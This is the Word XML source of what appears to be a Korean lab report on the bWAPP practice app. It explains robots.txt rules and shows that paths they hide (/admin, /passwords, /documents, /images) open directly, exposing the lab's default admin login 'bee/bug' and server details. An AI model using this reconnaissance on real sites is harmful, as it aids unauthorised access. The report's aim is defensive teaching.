          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00A8495D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">‘GoodBot’ </w:t>
      </w:r>
      <w:r w:rsidR="00A8495D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>봇은 사이트 크롤링 가능</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19D0FD2C" w14:textId="23397651" w:rsidR="00A8495D" w:rsidRDefault="00A8495D" w:rsidP="00FA6099">
      <w:pPr>
        <w:ind w:firstLine="800"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A8495D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>②</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> B</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>adBot</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>은 모든 디렉</w:t>
      </w:r>
      <w:r w:rsidR="00FA6099">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>터</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>리 접근 불가능</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D31158E" w14:textId="67D4235F" w:rsidR="00A8495D" w:rsidRDefault="00A8495D" w:rsidP="00FA6099">
      <w:pPr>
        <w:ind w:firstLine="800"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A8495D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>③</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> 모든 봇들은 해당 디렉</w:t>
      </w:r>
      <w:r w:rsidR="00FA6099">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>터</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>리 접근 불가능</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54680F62" w14:textId="22FA842C" w:rsidR="00A8495D" w:rsidRDefault="00A8495D" w:rsidP="00A8495D">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="38"/>
        </w:numPr>
        <w:ind w:leftChars="0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="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EB610FF" wp14:editId="3AFBB0A7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772275" cy="9734550"/>
                <wp:effectExtent l="0" t="0" r="9525" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="83" name="직사각형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73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8177A" id="직사각형 83" o:spid="_x0000_s1026" style="position:absolute;left:0;text-align:left;margin-left:0;margin-top:0;width:533.25pt;height:766.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  <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>U</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ser-agent </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">와 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Disallow </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>설정을 통해 특정 검색 엔진에 대한 접근 제어를 하는 설정이다.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FAD417B" w14:textId="77777777" w:rsidR="00FA6099" w:rsidRPr="00A8495D" w:rsidRDefault="00FA6099" w:rsidP="00FA6099">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:ind w:leftChars="0" w:left="1800"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4D1C62CA" w14:textId="1BF9FA86" w:rsidR="00A8495D" w:rsidRDefault="00A8495D" w:rsidP="00A8495D">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="400"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>3)</w:t>
      </w:r>
      <w:r w:rsidR="00FA6099">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>디렉</w:t>
      </w:r>
      <w:r w:rsidR="00FA6099">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>터</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">리 </w:t>
      </w:r>
      <w:r w:rsidR="00FA6099">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">접근 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AF505DF" w14:textId="67E9AE6F" w:rsidR="00A8495D" w:rsidRPr="00FA6099" w:rsidRDefault="00FA6099" w:rsidP="00A8495D">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="400"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">* </w:t>
      </w:r>
      <w:r w:rsidR="00A8495D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>이는 검색엔진에 대한 접근 제어이므로 사용자는 디렉토리에 접근 가능</w:t>
      </w:r>
      <w:r w:rsidR="00052489">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>하다.</w:t>
      </w:r>
      <w:r w:rsidR="00052489">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16E2BABD" w14:textId="56148349" w:rsidR="00FA6099" w:rsidRDefault="00FA6099" w:rsidP="00FA6099">
      <w:pPr>
        <w:ind w:left="800"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FA6099">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>①</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/admin </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>디렉터리</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01CFE28C" w14:textId="6766A7B7" w:rsidR="00FA6099" w:rsidRDefault="00FA6099" w:rsidP="00FA6099">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="36"/>
        </w:numPr>
        <w:ind w:leftChars="0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>URL &gt; [</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>비박스</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">_IP]/bWAPP/admin/ </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2763B64E" w14:textId="4CAC92B6" w:rsidR="00FA6099" w:rsidRPr="00FA6099" w:rsidRDefault="00FA6099" w:rsidP="00FA6099">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="36"/>
        </w:numPr>
        <w:ind w:leftChars="0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>관리자 페이지에 인증 과정 없이 직접 접근 할 수 있고,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">관리자 페이지에는 관리자 계정인 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>‘bee/bug’</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">와 내부 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>IP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>정보,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>서버 정보들이 노출되고 있다.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D8A518B" w14:textId="08E25433" w:rsidR="00FA6099" w:rsidRDefault="00B779A6" w:rsidP="00FA6099">
      <w:pPr>
        <w:ind w:left="800"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr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C4D4CF" wp14:editId="3FBA3DCA">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>1548333</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>316465</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1344706" cy="169049"/>
                <wp:effectExtent l="19050" t="19050" r="27305" b="21590"/>
                <wp:wrapNone/>
                <wp:docPr id="81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706" cy="1690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46423" id="직사각형 81" o:spid="_x0000_s1026" style="position:absolute;left:0;text-align:left;margin-left:121.9pt;margin-top:24.9pt;width:105.9pt;height:13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" filled="f" strokecolor="#c00000" strokeweight="2.25pt"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00FA6099" w:rsidRPr="00FA6099">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="744CB057" wp14:editId="2ED33455">
            <wp:extent cx="5760000" cy="3611970"/>
            <wp:effectExtent l="19050" t="19050" r="12700" b="26670"/>
            <wp:docPr id="8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1F3F7884-F5DE-4123-8892-99E61097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1F3F7884-F5DE-4123-8892-99E61097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11970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21F9D01" w14:textId="1075ED39" w:rsidR="00FA6099" w:rsidRDefault="00FA6099" w:rsidP="00FA6099">
      <w:pPr>
        <w:ind w:left="800"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FA6099">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>②</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>d</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ocuments </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>디렉터리</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="171A5CE1" w14:textId="290B315B" w:rsidR="00FA6099" w:rsidRDefault="00FA6099" w:rsidP="00FA6099">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="36"/>
        </w:numPr>
        <w:ind w:leftChars="0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>U</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>RL &gt; [</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>비박스_I</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>P]/bWAPP/documents/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D7132F9" w14:textId="32B45F65" w:rsidR="00FA6099" w:rsidRDefault="00B779A6" w:rsidP="00FA6099">
      <w:pPr>
        <w:ind w:firstLine="800"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr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BC64C8" wp14:editId="4C864810">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>1559250</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>353337</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1344706" cy="169049"/>
                <wp:effectExtent l="19050" t="19050" r="27305" b="21590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706" cy="1690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5FB31" id="직사각형 84" o:spid="_x0000_s1026" style="position:absolute;left:0;text-align:left;margin-left:122.8pt;margin-top:27.8pt;width:105.9pt;height:13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" filled="f" strokecolor="#c00000" strokeweight="2.25pt"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00FA6099" w:rsidRPr="00FA6099">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2C64EDB0" wp14:editId="7BFD9255">
            <wp:extent cx="5760000" cy="2494082"/>
            <wp:effectExtent l="19050" t="19050" r="12700" b="20955"/>
            <wp:docPr id="86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CCDDC2D-05E3-4D3D-9D30-825569815B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CCDDC2D-05E3-4D3D-9D30-825569815B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94082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E90BEDE" w14:textId="5CB87DB2" w:rsidR="00FA6099" w:rsidRDefault="00052489" w:rsidP="00FA6099">
      <w:pPr>
        <w:ind w:firstLine="800"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="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2A8CCB2" wp14:editId="6FAA6D0A">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="margin">
                  <wp:posOffset>-71610</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="margin">
                  <wp:posOffset>-148728</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="7028762" cy="9734550"/>
                <wp:effectExtent l="0" t="0" r="1270" b="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762" cy="973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D50" id="직사각형 91" o:spid="_x0000_s1026" style="position:absolute;left:0;text-align:left;margin-left:-5.65pt;margin-top:-11.7pt;width:553.45pt;height:766.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  <w:r w:rsidR="00FA6099" w:rsidRPr="00FA6099">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>③</w:t>
      </w:r>
      <w:r w:rsidR="00FA6099">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00FA6099">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/images </w:t>
      </w:r>
      <w:r w:rsidR="00FA6099">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>디렉터리</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C343B8A" w14:textId="27019AD8" w:rsidR="00FA6099" w:rsidRDefault="00FA6099" w:rsidP="00FA6099">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="36"/>
        </w:numPr>
        <w:ind w:leftChars="0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>U</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>RL &gt; [</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>비박스_I</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>P]/bWAPP/images/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44A5AE46" w14:textId="568761CE" w:rsidR="00FA6099" w:rsidRDefault="00B779A6" w:rsidP="00FA6099">
      <w:pPr>
        <w:ind w:left="800"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr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C00D6E" wp14:editId="29DBFA2B">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>1536065</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>327089</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1344706" cy="169049"/>
                <wp:effectExtent l="19050" t="19050" r="27305" b="21590"/>
                <wp:wrapNone/>
                <wp:docPr id="94" name="직사각형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706" cy="1690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58E04" id="직사각형 94" o:spid="_x0000_s1026" style="position:absolute;left:0;text-align:left;margin-left:120.95pt;margin-top:25.75pt;width:105.9pt;height:13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" filled="f" strokecolor="#c00000" strokeweight="2.25pt"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00FA6099" w:rsidRPr="00FA6099">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="55525D7A" wp14:editId="69EA53BD">
            <wp:extent cx="5760000" cy="3791936"/>
            <wp:effectExtent l="19050" t="19050" r="12700" b="18415"/>
            <wp:docPr id="88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8A13C2E-B3CA-4813-8560-A8B2C706BE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8A13C2E-B3CA-4813-8560-A8B2C706BE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91936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79FE9C" w14:textId="57459FB7" w:rsidR="00FA6099" w:rsidRDefault="00052489" w:rsidP="00FA6099">
      <w:pPr>
        <w:ind w:left="800"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00052489">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>④</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/passwords </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>디렉터리</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="384D659B" w14:textId="0D90ED7E" w:rsidR="00052489" w:rsidRDefault="00052489" w:rsidP="00052489">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="36"/>
        </w:numPr>
        <w:ind w:leftChars="0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>U</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>RL &gt; [</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>비박스_I</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>P]/bWAPP/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>p</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>asswords/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BF3A244" w14:textId="07BD42E8" w:rsidR="00052489" w:rsidRDefault="00052489" w:rsidP="00052489">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="36"/>
        </w:numPr>
        <w:ind w:leftChars="0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>패스워드 정보가 담긴 페이지를 디렉터리 리스팅으로 확인 할 수 있다.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02BC60E7" w14:textId="1DE61B69" w:rsidR="00052489" w:rsidRDefault="00052489" w:rsidP="00052489">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="36"/>
        </w:numPr>
        <w:ind w:leftChars="0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>이처럼,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">중요한 페이지는 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>robots.txt</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">로 접근 제어를 하는 것이 아니라 서버 자체에서 접근 제어를 </w:t>
      </w:r>
      <w:r w:rsidR="00B9373F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>해야한다.</w:t>
      </w:r>
      <w:r w:rsidR="00B9373F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
